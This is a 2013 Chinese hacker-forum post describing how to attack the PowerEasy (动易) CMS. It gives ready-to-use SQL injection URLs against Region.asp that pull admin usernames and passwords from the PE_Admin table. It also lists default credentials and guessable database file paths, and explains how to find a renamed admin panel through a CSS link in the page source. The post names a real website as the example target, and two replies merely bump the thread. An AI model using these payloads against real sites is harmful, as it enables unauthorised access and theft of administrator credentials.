搜索
查看: 735|回复: 2

动易漏洞利用方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-9 12:31:43 来自手机 | 显示全部楼层 |阅读模式
注入:
Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1

Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+1<2+and+'1'='1


admin
admin888
'or'='or'
8888
2007
2008
2006
SiteManageCode8888/SiteManageCode
database/SiteWeaver6.5.mdb
database/SiteWeaver.mdb
PowerEasy2006
#SiteWeaver6.5.asa
PowerEasy2007
PowerEasy2008
database/PowerEasy2006.mdb
database/PowerEasy2007.mdb
database/PowerEasy2008.mdb


找后台方法:


    这个方法很巧,但也不是全部都行,因为有些的已经修改admin_login.asp的名称,针对修改路径是很有效的,也可以说是利用了管理员对css的疏忽。


漏洞文件:


  region.asp


  1、打开某动易核心的网站,在域名后加region.asp访问,如:http://www.hkyjj.com/region.asp。


  便会显示下面的内容:
  国家/地区:
  省/市/自治区:
  市/县/区/旗:


  2、然后查看“源文件”,在第四行有一段嵌入css的代码:


  <link href="Admin/Admin_Style.css" rel="stylesheet" type="text/css">


  可以看到路径是:"Admin/Admin_Style.css",便得知后台路径为“Admin/”,即“Admin_Style.css”前面的文件夹路径为后台路径。


产生原因:


    调用的CSS文件存放在后台目录下,导致利用源代码的查询而获取物理路径
854955425 该用户已被删除
发表于 2013-10-9 12:41:06 | 显示全部楼层
帮帮顶顶!!
854955425 该用户已被删除
发表于 2013-10-9 12:52:01 | 显示全部楼层
支持一下
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表